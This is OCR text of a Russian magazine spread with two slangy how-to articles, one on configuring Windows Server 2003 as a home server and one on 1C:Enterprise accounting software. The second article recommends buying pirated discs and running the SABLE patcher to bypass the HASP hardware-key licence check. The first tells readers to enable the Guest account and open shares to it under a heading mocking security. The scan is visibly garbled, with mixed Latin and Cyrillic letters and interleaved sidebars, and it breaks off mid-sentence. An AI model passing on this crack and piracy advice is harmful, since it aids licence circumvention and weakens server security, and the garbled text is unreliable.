будет интересна только Standard 
Edition, ибо именно она предназна- 
чена для простых смертных. Ос- 
тальные принципиально ничем не 
отличаются, лишь некоторыми по- 
лезными и бесполезными фифоч- 
ками с бирюльками. Enterprise - на- 
вороченная бодяга для многопро- 
цессорных систем и, соответствен- 
но, для крупного бизнеса. Я сильно 
сомневаюсь в том, что ты админ в 
крупной конторе, иначе бы ты сие 
безобразие не читал =). Web - рас- 
считана на веб-сервера, со всеми 
вытекающими отсюда последствия- 
ми. Datacenter - самая наворочен- 
ная ботва (товарищи мягко-мелкие 
много и увлеченно кидают пальцы 
на тему того, что это наикрутейшая 
на текущий момент ось из всех, 
созданных человечеством), кото- 
рая у тебя дома вряд ли пойдет 
(имея 8 процессоров в минималь- 
ных системных требованиях). Стан- 
дартная редакция, которую взялись 
потрогать мы, как утверждается, 
запросто пойдет на 133-м пне со 128 
метрами оперативы, а на 400-м бу- 
дет летать вполне (что она, кстати, 
и делает у меня дома на серванте). 


Процесс установки описывать 
несколько бессмысленно, ибо он 
ничем не отличается от стандартно- 
го МТевого инсталлятора; если ты 
ставил NT4, W2000 или ХР, аты это 
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НОВОЕ - ЭТО ХОРОШО 
ЗАБЫТОЕ СТАРОЕ 


ТРОГАЕМ СВОИМИ РУЧИЩАМИ 
WINDOWS 2003 SERVER 


| [ $ Manage Your Server 


Ч Manageng Your Sever Roles 
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Бирюлька 


делал почти наверняка, то никаких 
вопросов возникнуть не должно. 
Отжирает эта бестия около полуто- 
ра гигов на винте, такой объем нын- 
че наскрести не сложно, поэтому 
наезжать шибко на Микросовт не 
будем, хотя и подозревая про горы 
мусора и всяких бесполезных фин- 
тифлюшек в составе оськи. Пущай 
дети тешатся, нам не тоскливо от 
этого ничуть. Будем считать, что ты 
заинсталлил ось без особых проб- 
лем. Теперь давай посмотрим, что 
от нас спрятали внутри... 


DELETED ADMINISTRATION 

При наличии только одного монито- 
ра, клавы и мыши несколько неу- 
добно встает проблема администри- 
рования серванта. Это получается, 
что каждый раз я должен отклю- 
чать все это барахло от основного 
рабочего компа и подключать к 
серванту, что нисколько не скраши- 
вает серые будни. И тут полезной 
фишкой, как ни странно, оказалась 
поддержка удаленного рабочего 
стола, упростив задачу удаленного 
администрирования донельзя, еще 
и превратив мой домашний сервант 
в полноценную многопользова- 
тельскую рабочую машинку =). 
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ROLE MANAGER 
Еще одной приятной, но лишь Ha 
первый взгляд не шибко полезной, 
а более украшательской фишкой 
является Server Role Manager, кото- 
рый всплывает при каждом запус- 
ке, если только не поставлена га- 
лочка в левом нижнем углу окна, 
свидетельствующая об обратном. 
Вопреки всем ожиданиям, он ока- 
зывается действительно полезен, 
если, скажем, надо поднять сервер 
достаточно быстро, а копаться во 
всяких инсталляторах и прочем не 
охота. За считанные секунды, лег- 
ким нажатием на кнопенцию “Add 
Server Role” и прохождением нес- 
ложного визарда, аки детского 
квеста с намеком на техническую 
сложность, поднимаются все основ- 
ные сервисы, а потом уже можно 
приниматься за увлекательный 
процесс настройки, который в боль- 
шинстве случаев ограничивается 
парой кликов мыши в ММС 
(Microsoft Management Console) и 
все. Микрососрт, что с них взять... 
Кстати, как и что делать с новым 
сервисом, можно почитать в хелпе, 
который вызывается назойливой 
иконкой “Review the next steps for 
this role”. 
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Это хочу, это хочу, и это тоже хочу 


ШАРЫ 

Для того чтобы на серванте исп- 
равно заработали шары, тебе пот- 
ребуется установить File Server 
через пресловутый менеджер ро- 
лей сервера. Имея за спиной бо- 
гатый опыт “Next >" кликанья и 
чуток смекалки, с этой задачей 
справиться несложно. Новые рас- 
шарки можно добавлять как ста- 
рым дедовским способом (правой 
кнопенцией на желаемой папке), 
так и через очередной мастер, ко- 
торый находится прямо в менед- 
жере ролей. Однако не все, как 
может показаться на первый 
взгляд, так просто. Если ты поп- 
робуешь обратиться к шарам тво- 
его серванта из сети прямо сей- 
час, то вместо полного собрания 
композиций Aphex Тм/п'а ты уви- 
дишь добротный мужской поло- 
вой орган в троекратном увеличе- 
нии. А все почему? А потому что 
в Микрососфте твердо уверены, 
что ты своей много лет с трудом 
собираемой коллекцией делиться 
захочешь далеко не со всеми, а 
лишь с некоторыми. Поэтому те- 
перь тебе придется поворошить 
настройки локальной безопаснос- 
ти. Для начала заенабль аккаунт 
гостя, Start->Administrative Tools- 
>Computer Management->System 
Tools->Local Users And Groups- 
>Users->Guest->npaBaa мышь- 
>Properties->y6upan чекбокс 
Account is disabled. OK. 
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Заенаблим гостя 
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FUCK THE SECURITY — 


Закрывай теперь эту дребедень и 
открывай Start->Administrative 
Tools->Local Security Policy->Local 
Policies->User Rights Assignment- 
>Access this computer from network- 
>Добавь гостя. 

Теперь перебирайся в раздел 
Security Options и приведи его в со- 
ответствие со скриншотом. 

Так, теперь дело за малым - к пра- 
вам каждого каталога, который ты 
выставил на публичное обозрение, 
допиши гостя, имеющего право все 
читать. Это - к примеру, на самом 
деле здесь тебя ожидает полная 
творческая свобода деятельности. 

Если я нигде не напортачил, ниче- 
го не забыл и не сказал ничего 


лишнего, то все должно работать и 
быть в форме. 


WEB И FTP 

Логичным после настройки шаров 
мне кажется поставить IIS и запустить 
должным образом WEB и FTP серви- 
сы. Конечно, в любом случае ты пос- 
тавишь вместо убитого Internet 
Information Services нормальный 
апач, HO сия статья, к сожалению, о 
Bunge и ее стандартной поставке, так 
что, скрепя сераце, мы это все же зат- 
ронем. Сперва залезаем в нам уже 
знакомый менеджер ролей и добавля- 
em Application server. И тут же давим 
кнопенцию Manage this application 
server, попадая тем самым в очеред- 
ной ММС. Чтобы настроить желаемое, 
как несложно догадаться, нам придет- 
ся влезть в раздел IIS Manager и уда- 
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Товарищи мяг- 
ко-мелкие 
много и увле- 
ченно кидают 
пальцы на те- 
му того, что 
это наикру- 
тейшая на те- 
кущий момент 
ось из всех, 
созданных че- 
ловечеством. 


Кустарный веб-сервант 


лить все, что там появилось без на- 
шего ведома. Хотя это всем привыч- 
ный и надоевший IIS, я все же позво- 
лю себе вкратце поведать об основ- 
ных приемах работы с ним ;). Чтобы 
создать свой веб-сайт, нам, как это ни 
странно, придется надавить правой 
мышкой на раздел Web Sites и выб- 
рать там New->Web Site... Не без удо- 
вольствия пройдя несложный квест, 
попутно отвечая на несложные воп- 
росы типа “а в каком именно каталоге 
валяется ваш сайт?", мы получаем 
нечто, на первый взгляд, рабочее. 

Но если у тебя главная страница 
называется, скажем, index.html, то 
при попытке обратиться к сайту, а 
не напрямую к файлу, ты в лучшем 
случае получишь большой хрен в 


Если ты по- 
пробуешь об- С 

ратиться к 
шарам твоего 
серванта из 
сети прямо 
сейчас, то 
вместо полно- 
го собрания 
композиций 
Aphex Twin'a 
ты увидишь 
добротный 
—- мужской поло- 
= вой орган в 
троекратном 
увеличении. А 
все почему? 
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"...и послать 
всех в жопу, 
то есть, я хо- 
чу сказать, ни 
фига нет goc- 
тупа". Лечит- 
ся эта сипа 
когнитивная 
вполне дос- 
тупным спосо- 
бом - смекал- 
кой. 


А вот это - 


эксклюзивное 
развлечение 
от обожаемой 
нами корпора- 
ции! На сей 
раз они приго- 
товили 
действительно 
нетривиаль- 
ный квест, од- 
нако, прочитав 
документацию 
или подобный 
ей солюшен, 
разобраться в 
принципе мож- 
но, но ведь 
для нас, экс- 
периментато- 
ров, это жес- 
токое, позор- 
ное, инфан- 
тильное чите- 
рство! 


раде 


Default content раде 


лога сайта либо, если ты в мастере 
поставил галочку Enable Browsing, 
тоже хрен, но поменьше и с над- 
писью вроде “и послать всех в жо- 
пу, то есть, я хочу сказать, ни фига 
нет доступа". Лечится эта сипа ког- 
нитивная вполне доступным спосо- 
бом - смекалкой =). Правая мышь на 
твоем веб-сервере, вкладка 
Documents, и в раздел Enable default 
content раде добавляешь файло, ко- 
торое ты бы хотел видеть в браузе- 
ре, когда к твоему сайту обращают- 
ся без точного указания файла. 
Сюда, кстати, подойдет в принци- 
пе любое файло. Еще замечу, что 
можно держать кучу разных вирту- 
альных веб-серверов, отвечающих 
на запросы к разным айпишникам. 
ЕТР сервер настраивается похо- 
жим образом. То есть для затравки 
ты жмешь правой кнопкой на ЕТР 
Sites и выбираешь Tam New -> FTP 
Site. И снова проходишь квест. 
Если тебе надо сделать доступны- 
ми по фтп кучу каталогов, разбро- 
санных по всему винту (и даже за 
его пределами =), то специально для 
тебя удумали такую cpnyy, как Virtual 
Directory. Все та же правая кнопка 
мыши на твоем ftp сайте, New -> 
Virtual Directory. Вводишь первым 
делом alias твоего каталога, он будет 
виден под ним, как, к примеру, 
ftp://server/alias, затем - местонахож- 
дение самого каталога. Самая интри- 
га получается тогда, когда ты не об- 
наруживаешь этого самого каталога 
в корне фтп, но обращение напря- 
мую работает исправно =). Такая 
ботва лечится созданием каталога, 
одноименного виртуальному, в кор- 
не фтп сервера (например, c:\inet- 
pub\ftproot\alias). При обращении к 
нему ЕТР"шник автоматом перекинет 
юзверя в виртуальный каталог. 


nil 


Уже успевшие неоднократно надоесть 
визарды 


me 
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СКЛАДИРОВАНИЕ МЫЛА 

Снова лезем в менеджер, там нас 
вежливо спросят, откуда брать логи- 
ны и пароли пользователей и каково 
доменное имя этого серванта. В прин- 
ципе, в хелпе утверждается, что для 
нормальной работы серванта нужно 
постоянное подключение к Инету и 
зарегистрированное доменное имя, 
но нам, людям советским, на такие 
мелочи забить =). Чтобы смело поль- 
зоваться мылом, надо залезть в его 
настройки уже известным тебе обра- 
зом - через тот же менеджер ролей. 
Затем выбираешь раздел с именем 
твоего домена, давишь в правой па- 
нельке Ада Mailbox и заполняешь 
требуемые сведения. Кстати, если та- 


Добавляем ящичек для мыла 


кого юзверя нет, то она сама при тво- 
ем на то желании может добавить но- 
вого с этими параметрами. 

Настройка SMTP ведется почему-то 
отдельно от POP3 и находится она в 
разделе Application Server, во вклад- 
ке IIS Мападег->имя Komna->SMTP. Ни- 
чего особо интересного там настраи- 
вать не позволяют, разве что разре- 
шения по мелочи, ограничения на 
размер и прочие фитюльки. 


WINDOWS INTERNET NAME 
SERVICE 
Угадай, откуда ставится эта бодя- 
га? Неужто опять из Server Role 
Manager? Да, микрососфтовцы в 
этом плане оказались не очень 
оригинальными, и правильно на са- 
мом деле. Как ставить всякое ба- 
рахло, ты уже знаешь ;), поэтому 
особо на этом мы останавливаться 
не будем. Да и вообще, Ha WINS 
сервере останавливаться мы не бу- 
дем, ибо никаких жизненно важных 
настроек делать не приходится. 
Тебе осталось только заставить 
всех гавриков с вашей сетки про- 
писать у себя в настройках сети ag- 
рес сервера в none WINS Server. 


НИ 


TAT 


t 
| 
| 


Он работает себе втихаря, никого 
не трогает, жить помогает 


ПОТОКОВОЕ МЕДИА 

Не буду писать жирные водяные 
вступления, давай сам уже ставь 
Streaming Media Server сам знаешь 
откуда, и сейчас мы начнем этого 
зверя глядеть и увлеченно препа- 
рировать. Залезай в настройку и 
первым делом прибивай Sam- 
ple_Broadcast. Мы сами себе хозяе- 
ва, поэтому сделаем все по новой и 
по-своему. Дави на Publishing Point 
правым местом и выбирай “Add 
Publishing Point (Адуапсед)" (что 
мы, лохи какие-то что ли, визарда- 
ми всякими пользоваться?). Далее 
называй свое детище как душе 
угодно и выбирай файл/плей- 
лист/каталог для воспроизведения. 


А не послушать ли нам полную подборку 
товарищей Autechre, гениев эксперимен- 
тальной электронной музыки? 


Теперь выделяй свой новосоздан- 
ный паблишинг поинт и дави в пра- 
вой части экрана зеленую пимпу с 
треугольником внизу. Адрес твоего 
“интернет-радио” =) будет выгля- 
деть типа “mms://uma компа/имя по- 
инта", т.е. в моем случае это 
mms://server/bread. Тебе осталось 
только распространить этот урл вез- 
де, куда руки дотянутся, и почивать 
на лаврах, пиво попивая. Кстати, су- 
ществует реалтайм мониторинг по- 
тока, загруженности проца, количе- 
ства подключений и прочего, а во 
избежание перегруза сервера в 
настройках можно выставить макси- 
мальные значения этих параметров, 
по достижении которых сервер бу- 
дет уже отказывать новым пользо- 
вателям в подключении. Кстати го- 
воря, потоковое аудио, по моим лич- 
ным наблюдениям на серванте, peg- 
ко превышает 30% загрузки проца, 
оставаясь на среднем уровне около 
10-15%, что не может не радовать. 


ШАРИМ ИНЕТ 

А вот это - эксклюзивное развлече- 
ние от обожаемой нами корпора- 
ции! На сей раз они приготовили 
действительно нетривиальный 
квест, однако, прочитав документа- 
цию или подобный ей солюшен, ра- 
зобраться в принципе можно, но 
ведь для нас, экспериментаторов, 
это жестокое, позорное, инфан- 
тильное читерство! В общем так, 
твоя задача - поставить славный 
сервис под названием Routing And 
Remote Access. Там тебя по ходу 
инсталляции спросят, что именно 


Настройка роутера... 


ты хочешь иметь, но ты не теряйся; 
если тебе нужно расшарить модем- 
ный Инет, то выбирай первое 
(Remote Access), если выделенку 
для семьи =), то второе (Network 
Address Translation). С остальными 
пунктами можешь экспериментиро- 
вать отдельно и самостоятельно. 
Если у тебя диалап, то в следую- 
щем окне ты уже знаешь, где надо 
поставить галку. Дальнейшие окна 
ты оставляешь без изменений, 
только введешь диапазон адресов 
твоей сетки. После установки отк- 
рывай детальную настройку всего 
этого безобразия. Сперва залезь 
через правую кнопку мыши в 
Properties твоего серванта, поставь 
там галочку напротив “Router” и 
выбери “LAN and demand-dial rout- 
ing”. Дави на OK или Apply, тебя 
спросят: “A ты не думаешь, что ты 
умрешь, если роутер перезагрузит- 
ся", не пугаясь, соглашайся. 

После некоторой паузы дави пра- 
вой кнопкой на разделе IP Routing и 
выбирай там Properties, затем выде- 
ляй свой мопед и конфигурируй его. 
Ставь галку напротив Demand-dial 
routing connections и дави везде OK. 

Затем по уже отлаженной схеме 
дави правой кнопкой Ha Network 
Interfaces и выбирай там New 
Demand-dial Interface... На дальней- 
шие вопросы отвечай по своему 
усмотрению, основную сложность 
тут составляет в окне Static Routes 
нажать Add, а затем ОК (там все IP- 
шники должны быть по нулям и 
единичная метрика). После этого 
вводишь твои данные (логин/па- 
роль на Инет), и вроде бы надо 
уже радоваться жизни. Ан нет. Не 
все так просто в этом мире. Для то- 
го чтобы вся эта дребедень вне- 
запно заработала, дави правой 
мышью на General и возжелай go- 
бавить новый протокол, выбирай 
NAT/Basic firewall. Он несколько 
погрузится, потормозит и наконец 
создаст новый раздел под этим 
названием. Кликай на нем правой 
кнопкой ->New Interface и выбирай 
тот интерфейс, который ты создал 
ранее. Затем давишь еще раз и go- 
бавляешь туда Local Area 
Connections. Вроде бы даже на 
этом все. Теперь прописываешь у 
всех компов в сети, которым нужен 
Инет, в настройках сети в поле 
“Шлюз” адрес твоего серванта и 
довольствуешься этим. Кстати, да- 
бы автоматизировать процесс, там 
была придумана такая сфишка, как 


Dial-out hours (достигается путем 
кликанья на твоем интерфейсе 
правой кнопкой мыши). Однако 
шибко радоваться не начинай, ибо 
в каждой ложке меда можно найти 
ту еще бочку дегтя. Во-первых, 
максимальная детализация - 1 час. 
То есть точно хотя бы по минутам 
ты не настроишь. Во-вторых, это 
настройка разрешения только на 
звонок. Заставить ее автоматом 
класть трубку в определенное вре- 
мя мне так и не удалось. В-третьих, 
задержка составляет около 3-х ми- 
нут. То есть, если у тебя выставле- 
но разрешение, скажем, с 22-х go 
23-х часов, то реально звонить оно 
начнет где-то около 22:03. А если 
ты попытаешься ее отрубить вруч- 
ную в 23:00, то она, возомнив себя 
центром вселенной, начнет дозва- 
ниваться по новой. Сие не есть 


Настройка роутера, часть вторая 


очень круто, а то еще говнище на 
самом деле, так что развлекаться 
порой все же приходится. 


DNS 

Однако если ты попробуешь сое- 
диниться прямо сейчас, то уви- 
дишь тот предмет, который и так 
часто видишь. Хотя по явному IP 
все будет прекрасно пинговаться. 
О чем это говорит? А о том, что на- 
gO явно указать DNS сервер. В 
принципе, можно выведать его у 
прова и прописать всем в сети 
именно его, но тут встает пробле- 
ма, что если вдруг ты или кто-то из 
твоих товарищей уронил свой 
комп, то после множества чудных 
попоек IP DNS сервера не шибко 
вспоминается. Как вариант - пос- 
тавить на твоем серванте DNS, ко- 
торый будет форвардить все зап- 
росы к DNS прова. Опять же ста- 
вишь DNS сервер через менеджер 
ивего настройке правой мышью 
выбираешь Properties, лезешь во 
вкладку Forwarders и, пользуясь 
кнопкой Add, вводишь заранее 
выведанный !Р-шник (его можно 
узнать, позвонив в службу подде- 
ржки прова). 

Теперь достаточно прописать 
всем сетевикам в поле DNS айпиш- 
ник твоего сервера и радоваться 
жизни, водки нажираясь. 


ОБЩЕЕ ВПЕЧАТЛЕНИЕ 

Ну что я могу здесь сказать? По 
большому счету, это те же яйца, 
только если не сбоку, то сверху. 
Принципиально новых фишек заме- 
чено особо не было, есть мелкие 
приятности, есть крупные и очень 
раздражающие глюки и просто не- 
доработки/недоделки. Хотя нес- 
колько порадовал тот факт, что все 
мне нужное от серванта было nog- 
нято за каких-то там два часа без 
особых проблем. Под Линью еще 
неизвестно, сколько бессонных но- 
чей я бы провел, копаясь в конфи- 
гах =). Хотя и результат, я думаю, 
был бы другой. Так же, как это ни 
странно, ось вышла достаточно 
безглючной и для ее уровня быст- 
родействующей, сервант (целик 
366 с 128 метрами мозгов) практи- 
чески без перезагрузок работает 


Настройка DNS 


уже два месяца, и за это время не 
было ни одного глюка, ни одного 
зависона, хотя с него постоянно 
слушают музыку, смотрят фильмы, 
сидят в Инете... В процессе работы с 
осью постоянно преследует ощуще- 
ние, что находишься в чем-то Cpeg- 
нем между ХР и 2000, но несколько 
круче. Возникают некоторые подоз- 
рения в пользу недавно прокатив- 
шихся по Инету слухов о планах 
Микрососрта выпустить операцион- 
ку для рабочих станций на ядре 
2003 Server. А раз так, то очевидно 
вполне, что для этого добрую треть 
ядра переписывать вовсе не потре- 
буется и нужно будет лишь по ме- 
лочи вскопать реестр и изменить 
несколько параметров. Но за этим я 
отправлю тебя к оригинальной доке 
по преобразованию Server в 
Workstation (http://www.neowin.net/ 
articles.php?action=more&id=54), 
ибо заниматься тупым переводом и 
пересказом чужих идей - отнюдь не 
мой конек ;). 

Засим, дорогой друг, разреши отк- 
ланяться и пойти дальше жрать 
водку и копать ямы в лесу, подс- 
тавляя свое юное неокрепшее тело 


под атаки комаров. 


ГЕНА 
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Полезной 
фишкой, как 
ни странно, 
оказалась 
поддержка 
удаленного ра- 
бочего стола, 
упростив за- 
дачу удален- 
ного админи- 
стрирования 
донельзя, еще 
и превратив 
мой домашний 
сервант в пол- 
ноценную 
многопользо- 
вательскую 
рабочую ма- 
шинку. 


Улому UDO 


SOFT/Y YET МЕНЯ С YMA CBE 
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Перед ковыря- 
нием базы 1С в 
конфигураторе 
сделай бэкап 
имеющейся 
базы или 
ставь экспери- 
менты Ha 63- 
Kane. 


HASP - недо- 
рогой, но go- 
вольно эф- 
фективный 
метод защиты 
софта, осно- 
ванный на 
хардварном 
ключе. 


раде 


Леха ББ аКа А!еху$ 
(alex-sun@mtu.ru) 


кажешь, что пусть 

бухгалтера с ней и во- 

зятся, и будешь прав. 
Но только так мало где получится. 
Если ты даже простой админ и от 
тебя требуется поддержание в ра- 
боте сетки и замена картриджей в 
принтерах, будь уверен, что бухот- 
дел тебя достанет с тем, чтобы бы- 
ла установлена подходящая им 
программа. 


АДМИН VS 1С 

На российском рынке бухгалтерско- 
го ПО первое место по популярности 
занимает 1С:Предприятие. Не буду 
спорить, достойный продукт выпу- 
щен конторой IC. Правда, он был бы 
ничем, если бы такими конторами, 
как сама 1С и РАРУС, не была бы на- 
писана туева хуча всяких специали- 
зированных программ типа “Byxran- 
терия", “Работа и зарплата", “Тор- 
говля и склад", “Авто-альфа" и мно- 
гие другие. В них при желании мож- 
но вести просто все: от кассовой 
книги gO расчета заработной платы 
и получения различных отчетностей 
за интересующий промежуток вре- 
мени. Только вот пара загвоздочек 
все же есть. Программка далеко не 
бесплатная, к тому же денег доволь- 
но хороших стоит. А если еще при- 
бавить тот факт, что в контору нуж- 
но ставить одновременно несколько 
конфигураций, то сумма затрат на 
ПО приближается к штуке америка- 
нских рублей, а то и выше. Очень 
многих владельцев мелких и Cpeg- 
них контор жаба просто задушит 
расстаться с такими деньгами. А тре- 
бовать наладить работу бухгалтеров 
боссы все равно будут. Или постара- 
ются заставить админа самого соз- 
давать базу данных, подобную 1С. 
Если бы они знали, что задевелоп- 
пить подобную базу стоит раза в 3-4 
больше, чем покупка OyxcogpTa от 
1С! Но делать что-то надо. Иначе 
ведь могут и уволить, а еще машина 
не куплена, да и компушнику апг- 
рейд не мешало бы сделать. Так что 
надо шевелиться. 


0 КОНТОРЕ 1С 
Противника надо знать в лицо. Кон- 
тора 1С будет, конечно, помоложе 


me 
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Комплексная поставка 1С:Предприятия 


всем известного Microsoft'a - живет 
она с 1991 года, но даже это уже 
вполне солидный возраст. Занима- 
ется софтварным бизнесом, и, судя 
по всему, дела у них идут неплохо. 
Выпускают они софт для офисов 
(1С:Предприятие), обучающие прог- 
раммы (1С:Репетитор), игрушки вся- 
кие (Братья пилоты, Дальнобойщи- 
ки). Кроме этого, на широкую ногу 
поставлена реализация и поддерж- 
ка продукции - различные учебные 
центры, дистрибьюторы, франчай- 
зинговые конторы. Вызов "специа- 
листа" из франчайзинговой компа- 
нии обойдется примерно в 30 баков 
за час. Посмотрел я на таких спе- 
цов - некоторые просто ламо пол- 
ное, но есть и толковые люди. Во 
многие фирмы требуются на посто- 
янную или разовую работу 1С-ники. 
Так что освоение 1С может серьез- 
но укрепить твой бюджет :). 


1С:ПРЕДПРИЯТИЕ 
1С:Предприятие - это оболочка, к 
которой после ее установки привя- 
зываются всевозможные конфигу- 
рации. Это что-то типа windows 3.11, 
но немного для других целей. Если 
от тебя требуют установить, к при- 
меру, 1С:Бухгалтерия, то сначала 
по-любому придется поставить 
1С:Предприятие - оболочку, под ко- 
торой работает все остальное. 
Поставляется это хозяйство либо 
на дискетках, либо на сидюке. Это 


Вот так ругнется 1С на отсутствие ключа. 
А где же его взять? 


зависит от нужд покупателя и его 
возможностей (вдруг кто-то gO сих 
пор только с дискетами работать 
может :)). Вместе с установкой прог- 
раммы в ЕРТ-порт компа должен 
быть вставлен НА$Р-ключ и пос- 
тавлен для этого ключ-драйвер, без 
которого 1С даже не подумает за- 
пускаться. 


HASP - один из недорогих элект- 
ронных ключей от АЛАДДИН 
(http://aladdin.ru), который исполь- 
зуется для защиты ПО. Внешне 
этот девайс выглядит как обычный 
ЕРТ"шный разъем, только внутри 
него находится микруха хитрая. 


Аппаратный ключ HASP 


Пользовать HASP можно почти на 
любой оси - под Виндами, Пинуха- 
ми, полуосью. При помощи НА$Р"'а 
у создателей программ появляется 
возможность сдавать ПО в аренду, 
продавать программы в рассрочку, 
устанавливать ограничение по вре- 
мени запуска программы и многое 
другое, поскольку тот снабжен 
встроенными часами, питающимися 
автономно. Защита HASP’om go- 
вольно хитрая, но умные добрые 
люди нашли метод, как ее обойти :). 


"КОГДА НЕТ ДЕНЕГ..." 

Если никакие объяснения началь- 
ству о сложности ломания и уста- 
новки 1С:Предприятия не привели в 
выделению финансов на покупку, 
то тогда остается либо найти в про- 
даже левый диск с нужным софтом 
(обойдется он чуть дороже обыч- 
ных пиратс... ой, папа запрещает 
это слово говорить... просто обыч- 
ных дисков), или попросить кого- 
нибудь из друзей, работающих в 
более солидных конторах, записать 
на болванку нужный дистрибутив. 
С этим проблем не возникает. Вот 


только ключик никто точно не даст. 
Хотя, как показывает практика, он 
и не сильно нужен, ибо с ним бо- 
рются программными методами. 
Специально для возможности без- 
регистрационного запуска и работы 
с 1С написан патчер SABLE - прог- 
раммный HASP. После установки 
оболочки 1С:Предприятие надо 
просто запустить инсталляшку саб- 
ли и тем самым обрубить 1С-ную 
проверку. Сам автор сабли реко- 
мендует запускать патч на каждой 
машине в сети. Как показывает 
практика, это более надежный и 
простой способ - сбоев пока не 
наблюдалось. 


После установки сабли нужен только ребут 


Иногда бывает, что 1С не пропат- 
чивается с первого раза. В таких 
случаях придется либо попробо- 
вать залезть в созданные саблей 
менюшки и выбрать “Полный патч", 
либо просто повторно поставить 
саблю. Все вроде бы легко, но на 
двухпроцессорные мамки Sable не 
встает. Также имеющаяся версия 
Sable не будет работать nog 
Windows Server 2003. 


ЗОЕТ/УЧЕТ МЕНЯ С УМА СВЕДЕТ! 


2 ам LL) Les 


== & 


— — — 
Небе ей heii) Зее: 


of Е 


_ —-— 


Конфигурации под 1С:Предприя- 
тие поставляются как бы независи- 
мо от оболочки, то есть они имену- 
ются отдельными продуктами, толь- 
ко вот работать без Предприятия 
не будут. Все конфигурации внеш- 
не представляют собой обычный 
дистрибутив, которых ты наверняка 
на своем веку уже понаставил не- 
мало. Если будешь просто хоть 
чуть-чуть читать надписи, попада- 
ющиеся по ходу установки, то все 
встанет само по себе без проблем. 
После установки конфигурации при 
запуске оболочки будет представ- 


Если ты все же справился с такой 
не самой трудной задачей, то IC бу- 
дет хотя бы запускаться, правда, 
пустой. Теперь уже под нее надо 
будет ставить необходимые для ра- 
боты конфигурации. 


Чистенькая, как из прачечной, оболочка 1С 


зультат работы саблей 


лен перечень готовых к работе баз, 
из которых надо будет просто выб- 
рать нужную. 


КОНФИГУРАЦИИ 

ХУЖЕ КАСТРАЦИИ 

При выборе конфигурации ты на- 
верняка успел заметить такие пунк- 
ты меню, как 1С:Предприятие, Кон- 
qurypatop, Отладчик, Монитор, a 
также возможность поставить гал- 
ку около надписи "Монопольно". 
Понятное дело, что все это зачем- 
то нужно. 

Режим "Монопольно”, который OT- 
носится к запуску непосредственно 
1С:Предприятия, надо выбирать в 
случаях, когда к базе обращаются 


Конфигурация 1С:Предприятия для автосервисов - Авто-Альфа 


впервые, после неправильного вы- 
хода из работы с базой (как прави- 
ло, это либо повисание компушни- 
ка, либо юзер ну очень постарал- 
ся), а также для удаления когда-то 
отмеченных документов, элементов 
справочников и т.д. А для обычной 
рутинной работы нужно выбирать 
1С:Предприятие в чистом виде. Тут 
такая завязка всевозможных спра- 
вочников, что иной раз голова кру- 
гом идет, как такое можно было во- 
обще соединить? Например, когда 
подготавливаешь документ о реа- 
лизации продукции, то подбор де- 
лается из справочников номенкла- 
туры, которые забиты заранее, кли- 
енты выбираются из других спра- 
вочников, проверяются остатки 
продукции, дабы немного 3aTpyg- 
нить наваривание денег на прода- 
же несуществующих товаров 
(“Мертвые души” помнишь?). По 
ведущимся документам можно в 
любое время (точнее, когда на- 
чальник потребует) выдать быст- 
ренько какой-нибудь аналитичес- 
кий отчетик о том, как отлично (хо- 
рошо, херово, ужасно - нужное 
подчеркнуть) идут дела у конторы. 
Кстати, это будет полезно и самому 
делать иногда, чтобы знать, когда 
надо искать себе другую работу :). 
На мой взгляд, все 1С'’ные конфи- 
гурации при правильном их выборе 
под свои нужды способны на мно- 
гое. Но с ними надо постоянно ра- 
ботать, иначе теряется смысл веде- 
ния базы данных. Ну, посуди сам, 
кому нужна неактуальная база? А 
работать некоторым не хочется ну 
просто ни в какую. И тут начинают- 
ся фразы типа “Ee надо немного 
научить тому-то, вот этому и еще 
чему-то. Вот тогда я в ней буду все 
делать, а то все накроется, и мой 
труд будет напрасным”. Что тогда 
делать? У начальства денег про- 
сить на покупку еще чего-то? За- 
будь, ты на покупку левого диска 
денег едва смог выбить! Конечно, 


Tan 
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Покупая ne- 
вую 1С без 
поддержки, ты 
покупаешь 
большой ге- 
моррой за ма- 
ленькие день- 
ги. Может не 
стоит эконо- 
мить деньги 
босса на своем 
здоровье? 


Обрубить саб- 
лей защиту 1С 
- не самое 
трудное заня- 
тие, но так ты 
лишаешься 
возможности 
получать фир- 
менные обнов- 
ления. Следо- 
вательно, при- 
дется бегать в 
поисках по 
знакомым 
либо очень 
много рабо- 
тать ручками. 


Уломр UDO 


ОСи 4work 


Стоит немного 
разобраться 
во встроенном 
языке 1С, и ты 
легко дорабо- 
таешь нужную 
конфигурацию 
и удовлетво- 
ришь бухгал- 
тера :). 


Фирмам влом 
платить беше- 
ные бабки 
поддержке 1С, 
поэтому адми- 
ны со знанием 
этого комп- 
лекса очень 
ценятся 

и получают 
неплохую 
зряплату. 
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Конфигуратор в действии 


как вариант покупка еще чего-ни- 
будь не исключена, но тогда надо 
будет вести на одну базу больше. 
То есть что-то обязательно будет 
упущено или забыто (еще бы, ведь 
попробуй усмотреть за пятью БД 
одновременно). Но 1С:Предприятие, 
наверно, потому и пользуется 
столь высокой популярностью, что 
имеет свой собственный язык прог- 
раммирования и программу для 
конфигурирования имеющего хо- 
зяйства. Она даже так и называет- 
ся - “Конфигуратор”. 

С помощью конфигуратора созда- 
ются новые справочники, докумен- 
ты, печатные формы, журналы, от- 
четы и т.д. Обычно нетрудолюби- 
вым работникам хочется иметь та- 
кой хитрожопый документ, который 
должен будет проводиться, списы- 
вать остатки продукции, считать 
зарплату процентникам (народ, ко- 
торый получает какой-то процент 
от стоимости выполненной им рабо- 
ты) и еще чего-нибудь считать. Я 
лично очень надеюсь, что у меня 
на работе такой гемор не случится. 
Если что, скажу, что это технически 
не реализуемо :). Но вот для созда- 
ния различного рода печатных от- 
четностей зачастую можно даже не 
знать 1С'ный язык, а воспользо- 
ваться конструктором. От тебя пот- 
ребуется только выбирать имена 
полей документа, которые надо вы- 
водить на печать (что в шапке, что 
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Выбор элементов для генерации 
табличной части документа для печати 
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в табличной части, а что снизу 90- 
кумента), а остальное все будет 
сделано само по себе. 


После создания процедуры печа- 
ти документа надо будет только по- 
удобнее разместить кнопку, при на- 
жатии которой документ будет вы- 
водиться сначала на экран (для ви- 
зуальной проверки), а потом на 
принтере распечатываться. 

В свое время слово “IC” в кругу 
программеров было чуть ли ни не- 
цензурным! Удивляться тут особо 
нечему. Операторы на русском язы- 
ке! Для меня это было просто уда- 
ром. Ну не могу я русские операто- 
ры использовать! Есть, конечно, и 
английские варианты, но они нас- 
только криво переведены с русско- 
го, что уж быстрее будет по-русски 
научиться. Синтаксис напоминает 
что-то среднее между сями, дель- 
фями и бейсиком! Как им удалось 
